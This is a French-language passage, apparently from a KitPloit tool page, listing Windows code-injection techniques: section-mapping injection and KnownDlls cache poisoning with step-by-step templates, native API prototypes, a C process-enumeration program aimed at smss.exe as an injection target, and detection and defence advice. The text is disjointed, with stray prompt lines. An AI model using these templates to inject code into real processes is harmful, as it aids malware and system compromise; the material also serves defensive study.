  • NtMapViewOfSection (non documenté) ```c NTSTATUS NTAPI NtMapViewOfSection( HANDLE SectionHandle, HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, SECTION_INHERIT InheritDisposition, ULONG AllocationType, ULONG Win32Protect );
    root@kitploit:~

Modèle :

  1. Créer un objet de mappage de fichier à l'aide de CreateFileMapping
  2. Mapper une vue du fichier dans le processus courant à l'aide de MapViewOfFile
  3. Écrire la charge utile dans la vue mappée
  4. Utiliser NtMapViewOfSection pour mapper la vue dans le processus cible
  5. Exécuter la charge utile dans le processus cible

Détection et défense :

  • Surveiller les schémas suspects de création de mappages de fichiers et de vues
  • Mettre en œuvre une surveillance du mappage mémoire pour détecter une utilisation inattendue de la mémoire partagée
  • Utiliser des solutions EDR capables de détecter les techniques d'injection par mappage
  • Recourir à la détection comportementale pour identifier les processus présentant une utilisation anormale de fichiers mappés en mémoire

24. Empoisonnement du cache KnownDlls

Cette technique consiste à remplacer une DLL légitime du cache KnownDlls par une DLL malveillante.

Clés API :

  • NtSetSystemInformation (Non documentée) ```c NTSTATUS NTAPI NtSetSystemInformation( SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength );
    root@kitploit:~

Template:

  1. Créer une DLL malveillante portant le même nom qu'une entrée légitime de KnownDlls
  2. Créer un objet de section pour la DLL malveillante :
    • Utiliser NtCreateSection pour créer un objet de section
    • Mapper une vue de la section en mémoire
    • Écrire le contenu de la DLL malveillante dans la vue mappée
  3. Utiliser NtSetSystemInformation avec SystemExtendServiceTableInformation pour ajouter la DLL malveillante au cache KnownDlls
  4. La DLL malveillante sera chargée par les processus à la place de la DLL légitime

Détection et défense :

  • Mettre en œuvre des contrôles d'intégrité de KnownDlls
  • Surveiller les modifications du cache KnownDlls
  • Utiliser des solutions EDR capables de détecter l'empoisonnement du cache KnownDlls
  • Appliquer la liste blanche et la vérification de signature de code pour les DLL du cache KnownDlls

Considérations supplémentaires pour la détection et la défense

  1. Mettre en œuvre une stratégie robuste de liste blanche d'applications pour empêcher l'exécution d'exécutables et de DLL non autorisés.
  2. Utiliser Windows Defender Exploit Guard ou des technologies similaires pour activer les règles de réduction de la surface d'attaque (ASR).
  3. Maintenir les systèmes et les logiciels à jour avec les derniers correctifs de sécurité.
  4. Utiliser le contrôle de compte d'utilisateur (UAC) et le principe du moindre privilège pour limiter l'impact des injections réussies.
  5. Mettre en œuvre la segmentation du réseau pour limiter les déplacements latéraux en cas d'attaque réussie.
  6. Utiliser des technologies de protection autonome des applications au moment de l'exécution (RASP) pour détecter et empêcher les tentatives d'injection en temps réel.
  7. Effectuer régulièrement des activités de chasse aux menaces pour rechercher de manière proactive les signes de techniques d'injection.
  8. Mettre en œuvre et maintenir un système robuste de gestion des informations et des événements de sécurité (SIEM) pour corréler et analyser les événements de sécurité.
  9. Organiser régulièrement des formations de sensibilisation à la sécurité pour que les utilisateurs reconnaissent et signalent les activités suspectes.
  10. Effectuer régulièrement des tests d'intrusion et des exercices d'équipe rouge pour identifier les vulnérabilités et améliorer les défenses contre les techniques d'injection.

Énumération des processus```c

#include <stdio.h> #include <Windows.h> #include <tlhelp32.h> #include <errhandlingapi.h> // GetLastError #include <heapapi.h> // HeapCreate, HeapAlloc, HeapDestroy #include <strsafe.h> // StringCchPrintf #include <assert.h> #include <tchar.h>

void ErrorExit(LPCTSTR lpszFunction); int ProcessEnumerateAndSearch(const wchar_t* ProcessName, PROCESSENTRY32* lppe); int PrintProcessInfo(const PROCESSENTRY32* lppe);

int PrintProcessInfo(const PROCESSENTRY32* lppe) { assert(lppe);

root@kitploit:~
wprintf(L"PROCESS : %ls\n", lppe->szExeFile);

int PID = static_cast<int>(lppe->th32ProcessID);
if (PID == 0) {
    wprintf(L"ERR : Process Not Found.\n");
    return 0;
}

wprintf(L"PID : %i\n\n", PID);
return 1;

}

void ErrorExit(LPCTSTR functionName) { constexpr DWORD FLAGS = FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS; constexpr DWORD LANG_ID = MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT); constexpr size_t EXTRA_CHARS = 40;

root@kitploit:~
DWORD errorCode = GetLastError();
LPTSTR messageBuf = nullptr;

FormatMessage(FLAGS, NULL, errorCode, LANG_ID, (LPTSTR)&messageBuf, 0, NULL);

if (messageBuf) {
    size_t funcNameLen = _tcslen(functionName);
    size_t messageLen = _tcslen(messageBuf);
    size_t bufSize = (funcNameLen + messageLen + EXTRA_CHARS) * sizeof(TCHAR);

    LPTSTR displayBuf = static_cast<LPTSTR>(LocalAlloc(LMEM_ZEROINIT, bufSize));
    if (displayBuf) {
        StringCchPrintf(displayBuf, LocalSize(displayBuf) / sizeof(TCHAR), TEXT("%s failed with error %d: %s"), functionName, errorCode, messageBuf);
        MessageBox(NULL, displayBuf, TEXT("Error"), MB_OK);

        LocalFree(displayBuf);
    }

    LocalFree(messageBuf);
}

ExitProcess(errorCode);

}

int ProcessEnumerateAndSearch(const wchar_t* ProcessName, PROCESSENTRY32* lppe) { assert(ProcessName && lppe);

root@kitploit:~
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE)
    ErrorExit(TEXT("CreateToolhelp32Snapshot"));

lppe->dwSize = sizeof(PROCESSENTRY32);

if (Process32First(hSnapshot, lppe) == FALSE) {
    CloseHandle(hSnapshot);
    ErrorExit(TEXT("Process32First"));
}

int pFoundFlag = 0;
do {
    size_t wcProcessName = wcslen(ProcessName);
    if (wcsncmp(lppe->szExeFile, ProcessName, wcProcessName) == 0) {
        if (!PrintProcessInfo(lppe)) continue;
        pFoundFlag = 1;
        break;
    }
} while (Process32Next(hSnapshot, lppe));

CloseHandle(hSnapshot);

return pFoundFlag;

}

int main(int argc, char** argv) { wchar_t pName[] = L"smss.exe"; // process name we will be injecting PROCESSENTRY32 lppe = { 0 };

root@kitploit:~
if (ProcessEnumerateAndSearch(pName, &lppe)) {
    // do some stuff
}
else {
    return 1;
}

return 0;

}

root@kitploit:~
Télécharger l’outil
root@kitploit:~
  • NtQueueApcThread (non documenté) ```c NTSTATUS NTAPI NtQueueApcThread( IN HANDLE ThreadHandle, IN PIO_APC_ROUTINE ApcRoutine, IN PVOID ApcRoutineContext OPTIONAL, IN PIO_STATUS_BLOCK ApcStatusBlock OPTIONAL, IN ULONG ApcReserved OPTIONAL );
    root@kitploit:~
  • RtlCreateUserThread (voir ci-dessus)
  • QueueUserAPC ```c DWORD QueueUserAPC( PAPCFUNC pfnAPC, HANDLE hThread, ULONG_PTR dwData );
    root@kitploit:~
  • KeInitializeAPC (mode noyau, non documenté) ```c VOID KeInitializeApc( PRKAPC Apc, PRKTHREAD Thread, KAPC_ENVIRONMENT Environment, PKKERNEL_ROUTINE KernelRoutine, PKRUNDOWN_ROUTINE RundownRoutine, PKNORMAL_ROUTINE NormalRoutine, KPROCESSOR_MODE ProcessorMode, PVOID NormalContext );
    root@kitploit:~
  • NtQueryInformationProcess (Non documenté, voir ci-dessus)
  • NtCreateThreadEx (Non documenté) ```c NTSTATUS NTAPI NtCreateThreadEx( OUT PHANDLE ThreadHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN HANDLE ProcessHandle, IN PVOID StartRoutine, IN PVOID Argument OPTIONAL, IN ULONG CreateFlags, IN SIZE_T ZeroBits, IN SIZE_T StackSize, IN SIZE_T MaximumStackSize, IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL );
    root@kitploit:~
  • RollbackTransaction ```c BOOL RollbackTransaction( HANDLE TransactionHandle );
    root@kitploit:~